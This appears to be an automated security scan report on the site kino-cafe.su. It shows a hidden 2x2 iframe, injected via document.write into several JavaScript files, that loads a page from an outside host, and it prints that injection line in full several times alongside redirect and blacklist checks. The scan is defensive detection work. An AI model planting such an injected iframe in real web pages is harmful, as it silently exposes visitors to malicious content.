Scanned pages/files (note: the same hidden 2x2 iframe pointing to http://vcminden.de/mzmd.html?j=1002281 is reported in all four JavaScript files under /include/ listed below, so the injection is not confined to a single script)
Request | Server response | Status |
http://kino-cafe.su/ | 200 OK Content-Length: 12633 Content-Type: text/html | clean |
http://kino-cafe.su/include/ac.js | 200 OK Content-Length: 16424 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1002281></iframe>');
var article_id; var article_search; var main_url; function changed_category(){ if (article_search!=null) { article_search.close_popup(); if (document.getElementById('article_search').value!="") { article_search.send(document.getElementById('article_search').value); for (i = 1; i < arguments.length; i += 2) { var index=arguments[i+1].indexOf(this.searched_term); var name = this.highlight ? arguments[i+1].replace(re, nt) : arguments[i+1]; var value = this.highlight ? arguments[i].replace(re, nt) : arguments[i]; var html = "<span class='a'>"+name+"</span>"; results[c] = new Array(arguments[i+1], arguments[i], c, html); c++; } this.update_popup(results); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=1002281 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1002281> | ||
http://kino-cafe.su/include/functions.js | 200 OK Content-Length: 1207 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1002281></iframe>');
var tgs = new Array( 'div','td','tr','a'); var szs = new Array( '7pt','8pt','9pt','10pt','11pt','12pt','13pt' ); var startSz = 1; function ts( trgt,inc ) { if (!document.getElementById) return var d = document,cEl = null,sz = startSz,i,j,cTags; sz += inc; if ( sz < 0 ) sz = 0; } } function tsz( trgt,sz ) { if (!document.getElementById) return var d = document,cEl = null,i,j,cTags; if ( !( cEl = d.getElementById( trgt ) ) ) cEl = d.getElementsByTagName( trgt )[ 0 ]; cEl.style.fontSize = sz; for ( i = 0 ; i < tgs.length ; i++ ) { cTags = cEl.getElementsByTagName( tgs[ i ] ); for ( j = 0 ; j < cTags.length ; j++ ) cTags[ j ].style.fontSize = sz; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=1002281 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1002281> | ||
http://kino-cafe.su/include/DropDownMenuX.js | 200 OK Content-Length: 36527 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=1002281 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1002281> | ||
http://kino-cafe.su/include/ajax.js | 200 OK Content-Length: 8423 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=1002281 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1002281> | ||
http://kino-cafe.su/plugins/vbm/admin/show.php?show_zone=2 | 200 OK Content-Length: 139 Content-Type: text/html | clean |
http://kino-cafe.su/plugins/vbm/click.php?id=1 | 404 Not Found Content-Length: 1 Content-Type: text/html | clean |
http://kino-cafe.su/test404page.js | 404 Not Found Content-Length: 1 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kino-cafe.su
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Mon, 21 Apr 2014 00:16:03 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 12633
Content-Type: text/html;charset=windows-1251
Expires: Tue, 22 Apr 2014 00:00:00 GMT
Last-Modified: Sat, 19 Apr 2014 00:00:00 GMT
X-Powered-By: PHP/5.2.17
...12633 bytes of data.
GET / HTTP/1.1
Host: kino-cafe.su
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Mon, 21 Apr 2014 00:16:03 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 12633
Content-Type: text/html;charset=windows-1251
Expires: Tue, 22 Apr 2014 00:00:00 GMT
Last-Modified: Sat, 19 Apr 2014 00:00:00 GMT
X-Powered-By: PHP/5.2.17
...12633 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kino-cafe.su
Referer: http://www.google.com/search?q=kino-cafe.su
Result:
The response is similar to that of the first query; no suspicious redirects were found.
GET / HTTP/1.1
Host: kino-cafe.su
Referer: http://www.google.com/search?q=kino-cafe.su
Result:
The response is similar to that of the first query; no suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kino-cafe.su
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kino-cafe.su/
Result: kino-cafe.su is not infected or malware details are not published yet.
Result: kino-cafe.su is not infected or malware details are not published yet.